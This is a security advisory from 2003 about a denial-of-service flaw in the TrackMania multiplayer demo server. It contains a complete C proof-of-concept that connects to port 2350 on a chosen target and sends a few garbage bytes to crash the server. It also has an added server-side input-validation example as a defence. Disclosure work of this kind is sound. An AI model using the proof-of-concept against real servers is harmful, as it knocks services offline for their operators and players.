Overview
TrackMania Demo Denial of Service
Discovered on November 30th, 2003
Vendor:
TrackMania Official website
TrackMania is a "Stunt Car Racer"-like game. The multiplayer demo of this game is vulnerable to a denial of service.
Risk
| Exploit easiness | |
| Vulnerability spreading | |
| Impact | |
| Risk | |
Details
The multiplayer game uses TCP port 2350 to communicate. If you send some garbage to this port, the game server shuts down.
Exploit
Here is the proof of concept:
/*
 * [kill-trackmania.c]
 * A remote DoS that affects the Trackmania game server
 *
 * by Scrap
 * webmaster@securiteinfo.com
 * https://www.securiteinfo.com
 *
 * gcc kill-trackmania.c -o kill-trackmania -O2
 *
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>

int main(int argc, char *argv[])
{
    int sock;
    struct sockaddr_in sin;
    struct hostent *he;
    unsigned long start;
    char buffer[1024];
    unsigned long counter;

    printf("\n [kill-trackmania.c] by Scrap / Securiteinfo.com\n");
    if (argc<2)
    {
        printf("Usage: %s target\n\n",argv[0]);
        exit(0);
    }
    /* Resolve the target host name */
    if ((he=gethostbyname(argv[1])) == NULL)
    {
        herror("gethostbyname");
        exit(0);
    }
    start=inet_addr(argv[1]);
    counter=ntohl(start);
    sock=socket(AF_INET, SOCK_STREAM, 0);
    memset(&sin, 0, sizeof(sin));
    bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
    sin.sin_family=AF_INET;
    sin.sin_port=htons(2350);   /* TrackMania multiplayer port */
    if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
    {
        perror("connect");
        exit(0);
    }
    printf("\n\t Sending Bomb... \n");
    /* Any data the server does not expect is enough; only 17 bytes are sent */
    send(sock, "Bomb from Securiteinfo.com\n\n",17,0);
    close(sock);
    printf("\t Bomb sent...\n");
    return 0;
}
Download
kill-trackmania.c.
Solution
The vendor has been informed and has solved the problem.
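The advisory does not describe the vendor's fix or the game's wire protocol. The following C code is an added example, not code from the vendor or from the original advisory: it shows the usual server-side defence against this class of bug, where each client's bytes are validated and malformed input closes only that connection. The framing ('TM' magic plus a 16-bit length), the names and the limits are assumptions made for the example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define HDR_LEN     4
#define MAX_PAYLOAD 512   /* assumed upper bound for one message */

enum verdict { NEED_MORE, FRAME_OK, DROP_CLIENT };
struct client { uint8_t buf[HDR_LEN + MAX_PAYLOAD]; size_t used; };

/* Assumed framing (hypothetical): 'T' 'M' | 16-bit big-endian length | payload. */
static enum verdict check_frame(const uint8_t *b, size_t n, size_t *frame_len)
{
    if (n >= 1 && b[0] != 'T') return DROP_CLIENT;  /* reject as early as possible */
    if (n >= 2 && b[1] != 'M') return DROP_CLIENT;
    if (n < HDR_LEN) return NEED_MORE;
    size_t len = ((size_t)b[2] << 8) | b[3];
    if (len > MAX_PAYLOAD) return DROP_CLIENT;      /* never trust the peer's length */
    *frame_len = HDR_LEN + len;
    return n >= *frame_len ? FRAME_OK : NEED_MORE;
}

/* Feed bytes read from ONE socket. Returns the number of complete frames accepted,
 * or -1 when the caller must close this connection only; the server keeps running. */
int client_feed(struct client *c, const uint8_t *data, size_t n)
{
    int frames = 0;
    if (n > sizeof c->buf - c->used) return -1;     /* would overflow the buffer */
    memcpy(c->buf + c->used, data, n);
    c->used += n;
    for (;;) {
        size_t flen = 0;
        enum verdict v = check_frame(c->buf, c->used, &flen);
        if (v == DROP_CLIENT) return -1;
        if (v == NEED_MORE) return frames;
        /* a real server would dispatch the payload at c->buf + HDR_LEN here */
        memmove(c->buf, c->buf + flen, c->used - flen);
        c->used -= flen;
        frames++;
    }
}

int main(void)
{
    struct client c = {0};
    const uint8_t junk[] = "Bomb from Securit";     /* the 17 bytes the PoC sends */
    printf("garbage -> %d (close this client only)\n", client_feed(&c, junk, 17));
    return 0;
}
```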
Discovered by
Arnaud Jacques aka scrap
webmaster@securiteinfo.com
Tags
DENIAL OF SERVICE
ONLINE GAME